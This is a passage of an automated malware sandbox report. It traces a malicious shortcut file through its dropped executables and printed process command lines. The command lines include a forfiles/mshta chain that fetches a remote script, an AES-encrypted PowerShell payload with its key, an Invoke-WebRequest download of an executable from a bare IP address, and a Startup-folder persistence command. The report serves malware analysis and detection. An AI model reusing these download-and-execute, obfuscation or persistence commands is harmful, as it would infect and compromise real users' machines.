Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F87BE7010_2_00007FF79F87BE70
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F883C2010_2_00007FF79F883C20
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F91DB1810_2_00007FF79F91DB18
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8F1A1810_2_00007FF79F8F1A18
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F88FA4F10_2_00007FF79F88FA4F
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F87B9F010_2_00007FF79F87B9F0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F91BA0C10_2_00007FF79F91BA0C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8A793C10_2_00007FF79F8A793C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F89F8D010_2_00007FF79F89F8D0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8858D010_2_00007FF79F8858D0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F87183C10_2_00007FF79F87183C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8B184010_2_00007FF79F8B1840
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8ED87C10_2_00007FF79F8ED87C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F9217C010_2_00007FF79F9217C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8A175010_2_00007FF79F8A1750
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F9056A010_2_00007FF79F9056A0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8A95B010_2_00007FF79F8A95B0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F87B39010_2_00007FF79F87B390
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F9032AC10_2_00007FF79F9032AC
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8B529C10_2_00007FF79F8B529C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8A30DC10_2_00007FF79F8A30DC
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F882E3010_2_00007FF79F882E30
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F880E7010_2_00007FF79F880E70
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F91CE8C10_2_00007FF79F91CE8C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F890E9010_2_00007FF79F890E90
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8B6DE410_2_00007FF79F8B6DE4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8B2D2010_2_00007FF79F8B2D20
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F906C3410_2_00007FF79F906C34
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F872AE010_2_00007FF79F872AE0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F910AEC10_2_00007FF79F910AEC
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8AA8A010_2_00007FF79F8AA8A0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8B67F010_2_00007FF79F8B67F0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F91C6D410_2_00007FF79F91C6D4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F91A59C10_2_00007FF79F91A59C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F91055C10_2_00007FF79F91055C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8A84C010_2_00007FF79F8A84C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F89451410_2_00007FF79F894514
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8F83D410_2_00007FF79F8F83D4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8B240010_2_00007FF79F8B2400
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F89C3FC10_2_00007FF79F89C3FC
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F90632010_2_00007FF79F906320
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F90836010_2_00007FF79F908360
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8902C410_2_00007FF79F8902C4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F89C13010_2_00007FF79F89C130
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EBB02020_2_00EBB020
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EB94E020_2_00EB94E0
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EB9C8020_2_00EB9C80
Source: C:\Users\Public\Guard.exeCode function: 20_2_00ED23F520_2_00ED23F5
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F3840020_2_00F38400
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EE650220_2_00EE6502
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EBE6F020_2_00EBE6F0
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EE265E20_2_00EE265E
Source: C:\Users\Public\Guard.exeCode function: 20_2_00ED282A20_2_00ED282A
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EE89BF20_2_00EE89BF
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EE6A7420_2_00EE6A74
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F30A3A20_2_00F30A3A
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EC0BE020_2_00EC0BE0
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F0EDB220_2_00F0EDB2
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EDCD5120_2_00EDCD51
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F30EB720_2_00F30EB7
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F18E4420_2_00F18E44
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EE6FE620_2_00EE6FE6
Source: C:\Users\Public\Guard.exeCode function: 20_2_00ED33B720_2_00ED33B7
Source: C:\Users\Public\Guard.exeCode function: 20_2_00ECD45D20_2_00ECD45D
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EDF40920_2_00EDF409
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EBF6A020_2_00EBF6A0
Source: C:\Users\Public\Guard.exeCode function: 20_2_00ED16B420_2_00ED16B4
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EB166320_2_00EB1663
Source: C:\Users\Public\Guard.exeCode function: 20_2_00ECF62820_2_00ECF628
Source: C:\Users\Public\Guard.exeCode function: 20_2_00ED78C320_2_00ED78C3
Source: C:\Users\Public\Guard.exeCode function: 20_2_00ED1BA820_2_00ED1BA8
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EDDBA520_2_00EDDBA5
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EE9CE520_2_00EE9CE5
Source: C:\Users\Public\Guard.exeCode function: 20_2_00ECDD2820_2_00ECDD28
Source: C:\Users\Public\Guard.exeCode function: 20_2_00ED1FC020_2_00ED1FC0
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EDBFD620_2_00EDBFD6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009CB02024_2_009CB020
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009C94E024_2_009C94E0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009C9C8024_2_009C9C80
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009E23F524_2_009E23F5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A4840024_2_00A48400
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009F650224_2_009F6502
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009CE6F024_2_009CE6F0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009F265E24_2_009F265E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009E282A24_2_009E282A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009F89BF24_2_009F89BF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A40A3A24_2_00A40A3A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009F6A7424_2_009F6A74
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009D0BE024_2_009D0BE0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A1EDB224_2_00A1EDB2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009ECD5124_2_009ECD51
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A40EB724_2_00A40EB7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A28E4424_2_00A28E44
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009F6FE624_2_009F6FE6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009E33B724_2_009E33B7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009EF40924_2_009EF409
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009DD45D24_2_009DD45D
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009E16B424_2_009E16B4
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009CF6A024_2_009CF6A0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009DF62824_2_009DF628
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009C166324_2_009C1663
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009E78C324_2_009E78C3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009E1BA824_2_009E1BA8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009EDBA524_2_009EDBA5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009F9CE524_2_009F9CE5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009DDD2824_2_009DDD28
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009EBFD624_2_009EBFD6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009E1FC024_2_009E1FC0
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Guard.exe D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 009D1A36 appears 34 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 009E8B30 appears 42 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 009E0D17 appears 70 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00ED0D17 appears 70 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00EC1A36 appears 34 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00ED8B30 appears 42 times
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: String function: 00007FF79F898D58 appears 76 times
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 3021
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 3021Jump to behavior
Source: Process Memory Space: powershell.exe PID: 1260, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.expl.evad.winLNK@40/75@5/3
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8F3778 GetLastError,FormatMessageW,10_2_00007FF79F8F3778
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8DD5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00007FF79F8DD5CC
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8DCCE0 AdjustTokenPrivileges,CloseHandle,10_2_00007FF79F8DCCE0
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F08DE9 AdjustTokenPrivileges,CloseHandle,20_2_00F08DE9
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F09399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,20_2_00F09399
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A18DE9 AdjustTokenPrivileges,CloseHandle,24_2_00A18DE9
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A19399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,24_2_00A19399
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8F59D8 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,10_2_00007FF79F8F59D8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8EBE00 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,10_2_00007FF79F8EBE00
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8F5F2C CoInitialize,CoCreateInstance,CoUninitialize,10_2_00007FF79F8F5F2C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F876580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,10_2_00007FF79F876580
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRHJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2304:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_csjszw4o.lc5.ps1Jump to behavior
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\forfiles.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: R8CAg00Db8.lnkReversingLabs: Detection: 21%
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . \*i*\*2\msh*e https://tiffany-careers.com/ghep1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($vuOOVEuV){return -split ($vuOOVEuV -replace '..', '0x$& ')};$ernnEW = clean('4C4392ECE516D550361614F1B8641852253A5A9044A308574B9B1D67D2AA2493F763385A53C21C962D73AF7A3A1A7644FEF103968D9CE4BE22CDCF4C9AAAA0D1156C1042714327D0DF9559DCEF92D952D1FED7FD44F342E94970DDD5132E30A64E35E4751324A276E21D098222A9D80B841DC7508B47242C8DE36693A37A446E45337CE1895E882872A68C1B8DC77B41FAE1F5DE0A8934D3A20E197DA6F27C6B095CECC866561B5408D27B35AD836E83E5CFCA3209303BBA973A0E0D9CD3E9998D23C90BFE13CC4BEFAE3250CE0200F86C96B61BB66F12DDB70731B13C3A28A955F482A02B32FF9A15DA1ECFBBBF793CC72EDB34A5A987FF46C0D61D6E31A789B13290EB3AD9E662512ADC0281C570BCCF12079609337C2B50C6FF3BD620E71911E95424327F329EB0DC1C6F5355D6B9A0C38A95701B7EFFFD3792E6A3BF2C09DFC231E806D1546112A4E3CA8C984F0E37455D4A9B1BF07168B9D0A2AA9CFED23A36201580A871CA7A00A0FF1092079C043208CA9D5FB2B2CD7B9D78A4DB3176B4A187FC2B0A69302794F7EF5CF7B38EA290D6A3FD0FED4D1A7CFA6F9F2ABEB4968B37732EBE6F7B5D433925FCC54BCF9F0751476C4A1F7381FCAB8207125C23DF8455AB2E13D85EB368A1619B06BF2DA9EAAD111EFB8AEEDDEFD41D80A23271E7E72E7A5905A7C4F3CF522315763C528146A5D8861258033777A0C5EBD195000561C965AA4AC7B18EAD7327CE25B8624E927D2D5D7FDDC36C21B9772937ED991F17813F0F3A8422D3AF278FAD8A504D97390558B4C0E09B3F0AFAEB83FF0ED68659D2D0133F372F5CCA602FCFC65D5B169F7EFD754CC9B688D5590926DABC2E7CF00A4B3C64F8492DDBC72D696028CEA4EF1497C9951F051DD47FBA7AA633AE4216D74BB6544091543B7A4C88AA7D7449070259AA42EF74061F08CAEB6D24698FD62B73C9B854EF540BE2BC1197A260BC8EFAC5EB1F66809412345727AAA19E00AA6AB2B0AE4E8E2214D612DCF3CC187893D8E4EFA843640E5F762AF24639A3DA6573BCBFAAD965B1008B1DA5762FE0C1DEE2B3BC73609EABEB3867D7830D8FF386594BAC138E1F2B5BF3E19010CCEB41ED303E01E3AC4371CCB141E9B798EC90619F0930690897751682C457CE95E208E0D89FCFA0C3A2F215F55C4AFA67942C7969C7EC45757A3F2B843201BA5896CE084ECF029902929420A5A605DCAE06D0E20817E54A84154B910E2A7E99DCE88C63234F53567ECD466A94DB5A936652CFB9B2A1733BB00337D0AD339944F80BA2AFFF40DFE5A067255BCBBA6FDD8FDF8857B0D56E86B756F7C329B1C464F95203B87123A10F7826ED9D32686CD372031EB990E0F919E47B5551BDA69E3DE02837FD75820E2A01F6A7D0AC1F71A9F7457ADE2919759EEA4F517ADD7A983D85B4AB3F976B6B347C72A9F8CE4E17746B79C374BCF7DA567F5D6193036C3A9147BFBF55BD54659FD8DD5702914E8D495DF4376BC0D1E4380DFAEDE844E819363C215834E1E687ABC854482303E7F2A9138B86EA3385D31DA2D6CFAF1C47A1284645A362744A4C2705A1D4B9163FD1BFB07A0A75F1E0DB2117DE25DEDCE3420754D43D6D88BC61EAB468CDACE4EBC10E259AF12DED9C8A0C34E0A2EFB4BD9481FBB751CAA484B894364EA30FC61BF09678F49094CAE7B13B5DC645845DAD9D5663D049F75C8C5C48BD68780101A2414A8D606C6B1B06274EC46254D163CDB2BE295BC7899CDCFF4B92A1A447ACF4B39C8E69');$oZcBKP = [System.Security.Cryptography.Aes]::Create();$oZcBKP.Key = clean('614A73516F706C757242416C6E617351');$oZcBKP.IV = New-Object byte[] 16;$nFAfpwETU = $oZcBKP.CreateDecryptor();$jftLKJake = [Text.Encoding]::UTF8.GetString($nFAfpwETU.TransformFinalBlock($
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Marketing.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1684,i,8099529981057222917,3572816472393853467,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\PefjSkkhb.exe "C:\Users\user\AppData\Roaming\PefjSkkhb.exe"
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . \*i*\*2\msh*e https://tiffany-careers.com/ghep1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep1Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($vuOOVEuV){return -split ($vuOOVEuV -replace '..', '0x$& ')};$ernnEW = clean('4C4392ECE516D550361614F1B8641852253A5A9044A308574B9B1D67D2AA2493F763385A53C21C962D73AF7A3A1A7644FEF103968D9CE4BE22CDCF4C9AAAA0D1156C1042714327D0DF9559DCEF92D952D1FED7FD44F342E94970DDD5132E30A64E35E4751324A276E21D098222A9D80B841DC7508B47242C8DE36693A37A446E45337CE1895E882872A68C1B8DC77B41FAE1F5DE0A8934D3A20E197DA6F27C6B095CECC866561B5408D27B35AD836E83E5CFCA3209303BBA973A0E0D9CD3E9998D23C90BFE13CC4BEFAE3250CE0200F86C96B61BB66F12DDB70731B13C3A28A955F482A02B32FF9A15DA1ECFBBBF793CC72EDB34A5A987FF46C0D61D6E31A789B13290EB3AD9E662512ADC0281C570BCCF12079609337C2B50C6FF3BD620E71911E95424327F329EB0DC1C6F5355D6B9A0C38A95701B7EFFFD3792E6A3BF2C09DFC231E806D1546112A4E3CA8C984F0E37455D4A9B1BF07168B9D0A2AA9CFED23A36201580A871CA7A00A0FF1092079C043208CA9D5FB2B2CD7B9D78A4DB3176B4A187FC2B0A69302794F7EF5CF7B38EA290D6A3FD0FED4D1A7CFA6F9F2ABEB4968B37732EBE6F7B5D433925FCC54BCF9F0751476C4A1F7381FCAB8207125C23DF8455AB2E13D85EB368A1619B06BF2DA9EAAD111EFB8AEEDDEFD41D80A23271E7E72E7A5905A7C4F3CF522315763C528146A5D8861258033777A0C5EBD195000561C965AA4AC7B18EAD7327CE25B8624E927D2D5D7FDDC36C21B9772937ED991F17813F0F3A8422D3AF278FAD8A504D97390558B4C0E09B3F0AFAEB83FF0ED68659D2D0133F372F5CCA602FCFC65D5B169F7EFD754CC9B688D5590926DABC2E7CF00A4B3C64F8492DDBC72D696028CEA4EF1497C9951F051DD47FBA7AA633AE4216D74BB6544091543B7A4C88AA7D7449070259AA42EF74061F08CAEB6D24698FD62B73C9B854EF540BE2BC1197A260BC8EFAC5EB1F66809412345727AAA19E00AA6AB2B0AE4E8E2214D612DCF3CC187893D8E4EFA843640E5F762AF24639A3DA6573BCBFAAD965B1008B1DA5762FE0C1DEE2B3BC73609EABEB3867D7830D8FF386594BAC138E1F2B5BF3E19010CCEB41ED303E01E3AC4371CCB141E9B798EC90619F0930690897751682C457CE95E208E0D89FCFA0C3A2F215F55C4AFA67942C7969C7EC45757A3F2B843201BA5896CE084ECF029902929420A5A605DCAE06D0E20817E54A84154B910E2A7E99DCE88C63234F53567ECD466A94DB5A936652CFB9B2A1733BB00337D0AD339944F80BA2AFFF40DFE5A067255BCBBA6FDD8FDF8857B0D56E86B756F7C329B1C464F95203B87123A10F7826ED9D32686CD372031EB990E0F919E47B5551BDA69E3DE02837FD75820E2A01F6A7D0AC1F71A9F7457ADE2919759EEA4F517ADD7A983D85B4AB3F976B6B347C72A9F8CE4E17746B79C374BCF7DA567F5D6193036C3A9147BFBF55BD54659FD8DD5702914E8D495DF4376BC0D1E4380DFAEDE844E819363C215834E1E687ABC854482303E7F2A9138B86EA3385D31DA2D6CFAF1C47A1284645A362744A4C2705A1D4B9163FD1BFB07A0A75F1E0DB2117DE25DEDCE3420754D43D6D88BC61EAB468CDACE4EBC10E259AF12DED9C8A0C34E0A2EFB4BD9481FBB751CAA484B894364EA30FC61BF09678F49094CAE7B13B5DC645845DAD9D5663D049F75C8C5C48BD68780101A2414A8D606C6B1B06274EC46254D163CDB2BE295BC7899CDCFF4B92A1A447ACF4B39C8E69');$oZcBKP = [System.Security.Cryptography.Aes]::Create();$oZcBKP.Key = clean('614A73516F706C757242416C6E617351');$oZcBKP.IV = New-Object byte[] 16;$nFAfpwETU = $oZcBKP.CreateDecryptor();$jftLKJake = [Text.Encoding]::UTF8.GetString($nFAfpwETU.TransformFinalBlock($Jump to behavior
